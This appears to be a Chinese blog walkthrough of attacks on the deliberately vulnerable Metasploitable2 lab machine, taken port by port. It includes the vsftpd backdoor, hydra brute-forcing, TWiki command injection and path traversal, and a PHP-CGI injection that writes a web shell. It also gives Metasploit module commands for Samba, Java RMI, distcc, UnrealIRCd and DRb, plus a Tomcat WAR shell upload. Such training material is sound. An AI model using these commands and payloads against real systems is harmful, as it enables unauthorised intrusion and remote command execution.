metasploitable2靶场漏洞总结(部分)

端口

使用nmap扫描可得:
在这里插入图片描述

21vsftpd2.3.4笑脸后门漏洞

程序的后门代码绑定的侦听端口是 6200。
通过ftp进行连接 在账号后加上:),密码随意,这时会登录失败,再次扫描6200端口,会发现6200端口已经打开,最后用nc连接6200端口就能执行命令了。也可以使用msf搜索vsftpd,利用msf里的脚本攻击。
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

22弱口令

hydra -L logins.txt -P pws.txt -M targets.txt ssh 或者 使用msf里的ssh_enumusers 来爆破(msfadmin/msfadmin)。

23弱口令

msfadmin/msfadmin

25 CNNVD-200111-004

低危,产生超多SMTP错误导致服务拒绝(内存耗尽)。

53 ISC BIND

80 http

  1. twiki漏洞
    twiki版本为 01
    http://192.168.230.130/twiki/bin/view/Main/TWikiUsers?rev=2%20|whoami||echo
    在这里插入图片描述
    当twiki版本为4.0.x时,存在任意文件读取
    http://example.com/bin/viewfile/TWiki/TWikiDocGraphics?rev=1;filename=…/…/…/…/…/etc/passwd
  2. phpmyadmin漏洞
    版本:3.1.1
    爆破目录
    在这里插入图片描述
    扫到setup文件,
    登录界面重放操作
    修改url为
/phpmyadmin/?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input

表示修改配置文件中的参数all_url_include(打开引用文件功能)和auto_prepend_file(附加文件)
passthru为执行命令
可以使用echo “<?php \$cmd = \$_GET["cmd"];system(\$cmd);?>” > /var/www/cmd.php 命令来添加shell
反弹shell操作
在这里插入图片描述

  1. cgi参数注入
    server API 是CGI方式运行的,这个方式在PHP存在漏洞-Cgi参数注入
    use exploit/multi/http/php_cgi_arg_injection
  2. webdav
    https://blog.youkuaiyun.com/qq_41861526/article/details/103414741

111 rpcbind

use auxiliary/scanner/misc/sunrpc_portmapper
search sunrpc
在这里插入图片描述

139/445 smb

use exploit/multi/samba/usermap_script
最后smbclient -L //192.168.206.216获取共享目录
search smb (大部分为远程执行漏洞)
可能存在共享弱口令:netbios-ssn://192.168.230.130 (及使用IPC$连接,尝试连接未成功
用户名/密码:User/User

512 rexec(远程计算机上运行命令)爆破

hydra爆破

1099 java-rmi

CVE-2011-3556:
use exploit/multi/misc/java_rmi_server
set payload java/meterpreter/reverse_tcp
set RHOSTS xxx
run
在这里插入图片描述
CVE-2017-3241 rmi反序列化漏洞
存在有缺陷的第三方库如commons-collections(主要缺陷为第三方库)

1524 bind_shell

metasploitable2本身有shell,可以直接连接
nc 192.168.230.130 1524

2049 nfs

nfs有信息泄露漏洞

showmount -e 192.168.230.130 2049

但是靶场好像没有

2121 ftp

  1. 超级弱口令扫描出来存在弱口令
    在这里插入图片描述
  2. vsftpd后门漏洞
    search vsftpd
    use exploit/unix/ftp/vsftpd_234_backdoor

3306 mysql

用户名root 密码为空

3632 distccd

use exploit/unix/misc/distcc_exec
show payloads
 set payload cmd/unix/bind_perl
run

在这里插入图片描述

5432 postgresql

爆破

5900 vnc

爆破,密码为password

6667/6697 irc

search rcd
use exploit/unix/irc/unreal_ircd_3281_backdoor
show options
set rhosts 192.168.206.216
run

8009 ajp

poc下载:https://github.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi

8180 tomcat示例漏洞

当tomcat默认页面manager/html需要输入账号和密码时,metasploit 中有扫描器tomcat_mgr_login获取账号密码。用账号密码登录后,有上传war(压缩包rar改名为war)的地方,上传成功后,在url根目录添加上war包名/压缩包里的文件?cmd=whoami
在这里插入图片描述
也可以使用jar -cvf xx.war xx.jsp 生成war包,上传后访问 http://127.0.0.1:8080/war 包名(无后缀) / 包名内文件名
在这里插入图片描述

8787 drb

search drb
use use exploit/linux/misc/drb_remote_codeexec
set rhosts 192.168.206.216
run

搭建Metasploitable2靶场并对其攻击提权获得root权限可按以下步骤进行: ### 搭建Metasploitable2靶场 1. **网络环境准备**:准备好合适的网络环境,例如使用虚拟机软件(如VMware或VirtualBox)搭建一个内部网络。确保Kali Linux和Metasploitable2能在同一网络中,且可以相互Ping通。Kali Linux的地址可设置为192.168.1.4,Metasploitable2的地址设置为192.168.1.5 [^3]。 2. **安装Kali Linux和Metasploitable2**:分别下载Kali Linux和Metasploitable2的镜像文件,然后使用虚拟机软件进行安装。安装完成后,按照上述地址配置网络信息。 ### 对Metasploitable2靶场进行攻击提权 1. **漏洞利用**:使用Metasploit Framework进行漏洞利用。打开Kali Linux的终端,输入以下命令: ```bash msfconsole ``` 在Metasploit控制台中,使用以下命令搜索可利用的漏洞: ```bash search samba 3.x ``` 选择合适的漏洞利用模块,例如: ```bash use exploit/multi/samba/usermap_script ``` 查看可用的有效负载: ```bash show payloads ``` 选择合适的有效负载,例如: ```bash set payload cmd/unix/reverse ``` 查看模块的配置选项: ```bash show options ``` 设置靶机的IP地址: ```bash set RHOSTS 192.168.1.5 ``` 运行漏洞利用程序: ```bash run ``` 2. **权限提升**:漏洞利用后,通常只有 “Web 服务权限”(比如 www-data 用户),无法操作服务器的核心文件 / 命令。权限提升就是 “从低权限用户提升到高权限用户(如 root)”,这是渗透测试的核心难点。可以使用Metasploitable3靶机Linux提权的相关方法进一步提升权限 [^1]。 ### 合规声明 本文技术内容及配套脚本仅用于合法靶场练手和个人学习,严禁用于未授权的网络攻击或恶意测试行为。任何违规使用导致的法律责任,均由使用者自行承担 [^2]。
评论 1
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值